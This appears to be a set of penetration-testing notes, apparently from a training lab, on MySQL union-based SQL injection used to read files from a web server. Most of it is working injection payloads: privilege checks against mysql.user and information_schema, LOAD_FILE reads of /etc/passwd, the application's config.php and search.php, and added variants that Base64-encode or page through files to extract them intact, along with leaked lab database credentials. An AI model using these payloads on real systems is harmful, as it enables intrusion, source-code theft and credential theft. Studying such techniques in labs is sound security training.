SQLI READING FILES

For the DB user to load and read a file's content, the DB user must have the FILE privilege. Even with FILE, LOAD_FILE() returns NULL when the file does not exist, when the OS user running mysqld cannot read it, when the file is larger than max_allowed_packet, or when the secure_file_priv setting restricts reads to a specific directory (or disables them entirely when set to NULL), so a blank result does not by itself mean the injection failed.

IDENTIFYING DB USER FILE PRIVILEGES

root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
 * add a filter WHERE user="root" to show only the row for the user named root; replace root with the name returned by USER() when the application connects as a different account
 * Y means YES, i.e. the account holds the SUPER privilege
 * SUPER is a strong hint, but the privilege that actually gates LOAD_FILE() is FILE; check it the same way through the File_priv column of mysql.user
 * ALT: cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
    - this cmd lists every privilege granted to the named account directly from the information schema
       - FILE is the one that matters here, since it lets the attacker read local system files and potentially write files as well
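The checks above as they reach MySQL once the payload is spliced into the application's own query. This is an added example, not from the original notes; the four-column search statement (id, name, price, description from a products table, filtered with LIKE) is an assumption chosen to match the 1, 2, 3, 4 placeholders in the payloads, and the secure_file_priv and File_priv checks go beyond what the notes show.

```sql
-- Added example (not from the original page). The wrapping SELECT is an assumed
-- four-column search query; everything after the injected quote is attacker input,
-- and "-- -" comments out the trailing %' that the application appends.

-- 1. Which account is the web app connected as, and which server version?
--    Injected input:  ' UNION SELECT 1, CURRENT_USER(), @@version, 4-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1, CURRENT_USER(), @@version, 4-- -%';

-- 2. SUPER and FILE side by side. File_priv is the column that gates LOAD_FILE();
--    Super_priv is what the notes' payload reads.
--    Injected input:  ' UNION SELECT 1, CONCAT(user,'@',host), File_priv, Super_priv FROM mysql.user-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1, CONCAT(user,'@',host), File_priv, Super_priv FROM mysql.user-- -%';

-- 3. Same answer from information_schema, without hard-coding the grantee.
--    CURRENT_USER() returns root@localhost; grantee is stored as 'root'@'localhost',
--    so the quotes are rebuilt around the two halves.
--    Injected input:  ' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee=CONCAT("'",SUBSTRING_INDEX(CURRENT_USER(),'@',1),"'@'",SUBSTRING_INDEX(CURRENT_USER(),'@',-1),"'")-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1, grantee, privilege_type, is_grantable
  FROM information_schema.user_privileges
  WHERE grantee = CONCAT("'", SUBSTRING_INDEX(CURRENT_USER(),'@',1),
                         "'@'", SUBSTRING_INDEX(CURRENT_USER(),'@',-1), "'")-- -%';

-- 4. secure_file_priv decides whether FILE is usable at all:
--    NULL  -> LOAD_FILE() always returns NULL
--    ''    -> any path readable by the mysqld OS user
--    /dir/ -> only files under that directory
--    Injected input:  ' UNION SELECT 1, IFNULL(@@secure_file_priv,'NULL: file access disabled'), @@max_allowed_packet, 4-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1, IFNULL(@@secure_file_priv,'NULL: file access disabled'), @@max_allowed_packet, 4-- -%';
```

Run the fourth query before spending time on file reads: a FILE grant combined with secure_file_priv = NULL means LOAD_FILE() will silently return NULL for every path, and a directory value tells you which paths are even worth trying.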

READING LOCAL SYSTEM FILES

#passwd file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
 * this cmd returns the contents of /etc/passwd in the second column of the injected row
 * the same technique also works against the application's own files, which can leak its source code

#reading the configuration file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
 * output as rendered in the browser (the beginning of the file is cut off in these notes):
   'localhost', 'DB_USERNAME'=>'root', 'DB_PASSWORD'=>'dB_pAssw0rd_iS_flag!', 'DB_DATABASE'=>'ilfreight' ); $conn = mysqli_connect($config['DB_HOST'], $config['DB_USERNAME'], $config['DB_PASSWORD'], $config['DB_DATABASE']); if (mysqli_connect_errno($conn)) { echo "Failed connecting. " . mysqli_connect_error() . ""; } ?>

#reading source code file
root@oco:~$ BROWSER > {targetSite:port}
 input field: ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
 CTRL + U
 * the browser treats the returned PHP/HTML as markup, so open the page source (CTRL + U) to see the file verbatim
 * the source code may contain sensitive information such as database connection credentials, or reveal further vulnerabilities
 * the default Apache webroot is /var/www/html, and the vulnerable page identified is
   search.php, so its source lives at /var/www/html/search.php
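The three file reads above with the handling the bare LOAD_FILE() payloads lack: telling a NULL (unreadable, missing, too large, or blocked by secure_file_priv) apart from an empty result, keeping PHP source intact through the browser, and paging through files too large for one response. This is an added example, not from the original notes; the wrapping four-column search query is the same assumption as before, and the use of TO_BASE64() and SUBSTRING() is added here rather than taken from the page.

```sql
-- Added example (not from the original page). The wrapping SELECT is an assumed
-- four-column search query; the file paths are the ones the notes use.

-- 1. Distinguish "file is empty" from "LOAD_FILE() gave up". The third column
--    carries max_allowed_packet so an oversized file can be recognised.
--    Injected input:  ' UNION SELECT 1, IFNULL(LOAD_FILE('/etc/passwd'),'LOAD_FILE returned NULL'), @@max_allowed_packet, 4-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1,
  IFNULL(LOAD_FILE('/etc/passwd'), 'LOAD_FILE returned NULL'),
  @@max_allowed_packet, 4-- -%';

-- 2. PHP source is swallowed by the browser as markup (hence the CTRL + U step).
--    Base64 survives rendering unchanged; decode locally with `base64 -d`.
--    HEX() does the same on servers older than 5.6.1, which lack TO_BASE64().
--    Injected input:  ' UNION SELECT 1, TO_BASE64(LOAD_FILE('/var/www/html/config.php')), 3, 4-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1, TO_BASE64(LOAD_FILE('/var/www/html/config.php')), 3, 4-- -%';

-- 3. Large files: fetch the length once, then read fixed-size windows so nothing
--    is lost to column or page truncation. Increase the offset (1, 4001, 8001, ...)
--    until it passes the length returned in column three.
--    Injected input:  ' UNION SELECT 1, SUBSTRING(LOAD_FILE('/var/www/html/search.php'), 1, 4000), LENGTH(LOAD_FILE('/var/www/html/search.php')), 4-- -
SELECT id, name, price, description FROM products
WHERE name LIKE '%' UNION SELECT 1,
  SUBSTRING(LOAD_FILE('/var/www/html/search.php'), 1, 4000),
  LENGTH(LOAD_FILE('/var/www/html/search.php')), 4-- -%';
```

Reading /etc/passwd first is a cheap probe because it is world-readable on every Linux host; if even that comes back as NULL, the cause is secure_file_priv or a missing FILE grant rather than file permissions, and there is no point trying the webroot paths.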
